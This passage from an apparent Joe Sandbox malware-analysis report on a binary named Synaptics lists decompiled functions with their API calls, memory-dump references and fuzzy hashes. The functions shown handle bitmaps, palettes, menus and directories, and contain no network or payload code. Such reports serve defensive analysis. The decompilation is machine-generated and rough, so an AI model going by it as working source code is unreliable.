                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16b8f12cb14df9c6b7d791b8965e30f23c1242ed487bcd29c7da48a76f1dd96f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct HDC__* _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct HDC__* _t29;
                                                                                                                                                                                                                            				struct tagBITMAPINFO* _t32;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				struct HBITMAP__* _t43;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 = __ecx;
                                                                                                                                                                                                                            				_t43 = __eax;
                                                                                                                                                                                                                            				E00426DC0(__eax, _a4, __ecx);
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L004072E0();
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_push(_t46);
                                                                                                                                                                                                                            				_push(0x426fad);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t46 + 0xfffffff4;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(__edx);
                                                                                                                                                                                                                            					_t29 = _v16;
                                                                                                                                                                                                                            					_push(_t29);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					_v12 = _t29;
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L00407418();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                                                                                                                                                                                                            				_pop(_t39);
                                                                                                                                                                                                                            				 *[fs:eax] = _t39;
                                                                                                                                                                                                                            				_push(0x426fb4);
                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return DeleteDC(_v16);
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426F32
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F53
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F5F
                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,00426FB4,00000000,?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F9E
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00426FA7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3837315262-0
                                                                                                                                                                                                                            • Opcode ID: 923385af703c224445fe3f7018f1f50dd84332197b6e897708dbca319e94f8cc
                                                                                                                                                                                                                            • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 923385af703c224445fe3f7018f1f50dd84332197b6e897708dbca319e94f8cc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00426750(struct HDC__* __eax, signed int __ecx) {
                                                                                                                                                                                                                            				char _v1036;
                                                                                                                                                                                                                            				signed int _v1038;
                                                                                                                                                                                                                            				struct tagRGBQUAD _v1048;
                                                                                                                                                                                                                            				short _v1066;
                                                                                                                                                                                                                            				short* _t15;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				struct HDC__* _t23;
                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                            				short* _t31;
                                                                                                                                                                                                                            				short* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                            				 *_t32 = 0x300;
                                                                                                                                                                                                                            				if(__eax == 0) {
                                                                                                                                                                                                                            					_v1038 = __ecx;
                                                                                                                                                                                                                            					E004029DC(_t26, __ecx << 2,  &_v1036);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_t23 = __eax;
                                                                                                                                                                                                                            					_t18 = SelectObject(__eax, __eax);
                                                                                                                                                                                                                            					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                                                                                                                                                                                                            					SelectObject(_t23, _t18);
                                                                                                                                                                                                                            					DeleteDC(_t23);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v1038 != 0) {
                                                                                                                                                                                                                            					if(_v1038 != 0x10 || E004266B8(_t32) == 0) {
                                                                                                                                                                                                                            						E00426548( &_v1036, _v1038 & 0x0000ffff);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t15 = _t32;
                                                                                                                                                                                                                            					_push(_t15);
                                                                                                                                                                                                                            					L00407308();
                                                                                                                                                                                                                            					_t31 = _t15;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 00426769
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                                                                                                                                                                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00426798
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(?,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 004267DE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ObjectSelect$A590ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1056449717-0
                                                                                                                                                                                                                            • Opcode ID: e7d1ce7ffea08dbe9a9b300fc4b2c268702868957d9a1b5eb40c754f65446552
                                                                                                                                                                                                                            • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d1ce7ffea08dbe9a9b300fc4b2c268702868957d9a1b5eb40c754f65446552
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042AE8C(intOrPtr* __eax, void* __edx) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				struct HPALETTE__* _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				intOrPtr _v25;
                                                                                                                                                                                                                            				intOrPtr _v29;
                                                                                                                                                                                                                            				intOrPtr _v33;
                                                                                                                                                                                                                            				intOrPtr _v57;
                                                                                                                                                                                                                            				short _v59;
                                                                                                                                                                                                                            				short _v61;
                                                                                                                                                                                                                            				intOrPtr _v65;
                                                                                                                                                                                                                            				intOrPtr _v69;
                                                                                                                                                                                                                            				intOrPtr _v73;
                                                                                                                                                                                                                            				intOrPtr _v77;
                                                                                                                                                                                                                            				intOrPtr _v89;
                                                                                                                                                                                                                            				intOrPtr _v93;
                                                                                                                                                                                                                            				void _v97;
                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				struct HPALETTE__* _t56;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				struct HDC__* _t74;
                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t105 = _t107;
                                                                                                                                                                                                                            				_t108 = _t107 + 0xffffffa0;
                                                                                                                                                                                                                            				_t70 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t44 = E00429FC8(_v8);
                                                                                                                                                                                                                            				if(_t70 == _t44) {
                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                            					return _t44;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t46 = _t70 - 1;
                                                                                                                                                                                                                            					if(_t46 < 0) {
                                                                                                                                                                                                                            						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if(_t46 == 7) {
                                                                                                                                                                                                                            							_t49 =  *0x49d90c; // 0x422ec0
                                                                                                                                                                                                                            							_t44 = E00425F28(_t49);
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E004032B4( &_v97, 0x54);
                                                                                                                                                                                                                            							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                                                                                                                                                                                                                            							_t110 = _t108 + 0xc;
                                                                                                                                                                                                                            							_v13 = 0;
                                                                                                                                                                                                                            							_v77 = 0;
                                                                                                                                                                                                                            							_v73 = 0x28;
                                                                                                                                                                                                                            							_v69 = _v93;
                                                                                                                                                                                                                            							_v65 = _v89;
                                                                                                                                                                                                                            							_v61 = 1;
                                                                                                                                                                                                                            							_v59 =  *0x0049B8B3 & 0x000000ff;
                                                                                                                                                                                                                            							_t55 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                                                                            							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                                                                            							_t72 = _t70 - 2;
                                                                                                                                                                                                                            							if(_t72 == 0) {
                                                                                                                                                                                                                            								_t56 =  *0x49e894; // 0x100805eb
                                                                                                                                                                                                                            								_v12 = _t56;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t73 = _t72 - 1;
                                                                                                                                                                                                                            								if(_t73 == 0) {
                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                            									L00407638();
                                                                                                                                                                                                                            									_t74 = E00426060(_t55);
                                                                                                                                                                                                                            									_v12 = CreateHalftonePalette(_t74);
                                                                                                                                                                                                                            									_v13 = 1;
                                                                                                                                                                                                                            									_push(_t74);
                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                            									L00407888();
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									if(_t73 == 2) {
                                                                                                                                                                                                                            										_v57 = 3;
                                                                                                                                                                                                                            										_v33 = 0xf800;
                                                                                                                                                                                                                            										_v29 = 0x7e0;
                                                                                                                                                                                                                            										_v25 = 0x1f;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *[fs:eax] = _t110;
                                                                                                                                                                                                                            							 *((char*)(_v8 + 0x22)) = E00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t105),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                                                                                                                                                                                                                            							_pop(_t95);
                                                                                                                                                                                                                            							 *[fs:eax] = _t95;
                                                                                                                                                                                                                            							_push(0x42afe0);
                                                                                                                                                                                                                            							if(_v13 != 0) {
                                                                                                                                                                                                                            								return DeleteObject(_v12);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0042AF49
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000), ref: 0042AF65
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateDeleteHalftoneObjectPalette
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 733450718-3887548279
                                                                                                                                                                                                                            • Opcode ID: 6fa3a017ba8cbe3547f1b59ddf4885941dcce5041652f42a4a6b682d81354657
                                                                                                                                                                                                                            • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fa3a017ba8cbe3547f1b59ddf4885941dcce5041652f42a4a6b682d81354657
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0044E150(intOrPtr* __eax) {
                                                                                                                                                                                                                            				struct tagMENUITEMINFOA _v128;
                                                                                                                                                                                                                            				intOrPtr _v132;
                                                                                                                                                                                                                            				int _t16;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				struct HMENU__* _t36;
                                                                                                                                                                                                                            				MENUITEMINFOA* _t37;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t37 =  &_v128;
                                                                                                                                                                                                                            				_t29 = __eax;
                                                                                                                                                                                                                            				_t16 =  *0x49de44; // 0x49e744
                                                                                                                                                                                                                            				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                                                                                                                                                                                            					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                                                                                                                                                                                            					_t37->cbSize = 0x2c;
                                                                                                                                                                                                                            					_v132 = 0x10;
                                                                                                                                                                                                                            					_v128.hbmpUnchecked =  &(_v128.cch);
                                                                                                                                                                                                                            					_v128.dwItemData = 0x50;
                                                                                                                                                                                                                            					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                                                                            						_t16 = E0044E4D4(_t29);
                                                                                                                                                                                                                            						asm("sbb edx, edx");
                                                                                                                                                                                                                            						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                                                                                                                                                                                            							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                                                                                                                                                                                            							_v132 = 0x10;
                                                                                                                                                                                                                            							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                                                                                                                                                            							if(_t16 != 0) {
                                                                                                                                                                                                                            								return DrawMenuBar( *(_t29 + 0x38));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                                                                                                                                                                                            • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                                                                                                                                                                                            • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                            • String ID: DI$P
                                                                                                                                                                                                                            • API String ID: 3227129158-1383934172
                                                                                                                                                                                                                            • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402944(void* __eax, void* __edx) {
                                                                                                                                                                                                                            				char _v271;
                                                                                                                                                                                                                            				char _v532;
                                                                                                                                                                                                                            				char _v534;
                                                                                                                                                                                                                            				char _v535;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                            				if(__eax != 0) {
                                                                                                                                                                                                                            					 *_t26 = 0x40;
                                                                                                                                                                                                                            					_v535 = 0x3a;
                                                                                                                                                                                                                            					_v534 = 0;
                                                                                                                                                                                                                            					GetCurrentDirectoryA(0x105,  &_v271);
                                                                                                                                                                                                                            					SetCurrentDirectoryA(_t26);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x105,  &_v532);
                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                            					SetCurrentDirectoryA( &_v271);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return E00404C30(_t25, 0x105,  &_v532);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354,00000000), ref: 00402976
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354), ref: 0040297C
                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354,00000000), ref: 0040298B
                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,021E2354), ref: 0040299C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: f15565b64aa9ee1d14baca2a486c88969ad1acb5582208c8ab97ed5e6b3006bf
                                                                                                                                                                                                                            • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f15565b64aa9ee1d14baca2a486c88969ad1acb5582208c8ab97ed5e6b3006bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				int _t89;
                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                            				int _t117;
                                                                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                            				void* _t144;
                                                                                                                                                                                                                            				char _t153;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t120 = __ecx;
                                                                                                                                                                                                                            				_t143 = _t144;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t139 = __eax;
                                                                                                                                                                                                                            				_t117 = _a4;
                                                                                                                                                                                                                            				_push(_t144);
                                                                                                                                                                                                                            				_push(0x44b0e4);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t144 + 0xffffffe4;
                                                                                                                                                                                                                            				_t53 = E0044CE98(__eax);
                                                                                                                                                                                                                            				_t135 = _t53;
                                                                                                                                                                                                                            				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
                                                                                                                                                                                                                            					if((_t117 & 0x00000000) != 0) {
                                                                                                                                                                                                                            						__eflags = (_t117 & 0x00000002) - 2;
                                                                                                                                                                                                                            						if((_t117 & 0x00000002) == 2) {
                                                                                                                                                                                                                            							_t117 = _t117 & 0xfffffffd;
                                                                                                                                                                                                                            							__eflags = _t117;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t117 = _t117 | 0x00020000;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00404A58( &_v16, _v12);
                                                                                                                                                                                                                            				if((_t117 & 0x00000004) == 0) {
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					E00404DCC(_v16, 0x44b108);
                                                                                                                                                                                                                            					if(_t153 != 0) {
                                                                                                                                                                                                                            						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                                                                                                                                                                                            						__eflags =  *((char*)(_t139 + 0x3a));
                                                                                                                                                                                                                            						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                                                                                                                                                                                            							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                                                                                                                                                            							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
                                                                                                                                                                                                                            							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *((char*)(_t139 + 0x39));
                                                                                                                                                                                                                            						if( *((char*)(_t139 + 0x39)) != 0) {
                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                            							_t63 = E00404C80(_v16);
                                                                                                                                                                                                                            							_t65 = E00404E80(_v16);
                                                                                                                                                                                                                            							DrawTextA(E00425C68(_v8), _t65, _t63, _a12, _t117);
                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                            							_pop(_t127);
                                                                                                                                                                                                                            							 *[fs:eax] = _t127;
                                                                                                                                                                                                                            							_push(0x44b0eb);
                                                                                                                                                                                                                            							return E004049C0( &_v16);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _a8;
                                                                                                                                                                                                                            							if(_a8 == 0) {
                                                                                                                                                                                                                            								OffsetRect(_a12, 1, 1);
                                                                                                                                                                                                                            								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                                                                                                                                                                                            								_t89 = E00404C80(_v16);
                                                                                                                                                                                                                            								_t91 = E00404E80(_v16);
                                                                                                                                                                                                                            								DrawTextA(E00425C68(_v8), _t91, _t89, _a12, _t117);
                                                                                                                                                                                                                            								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _a8;
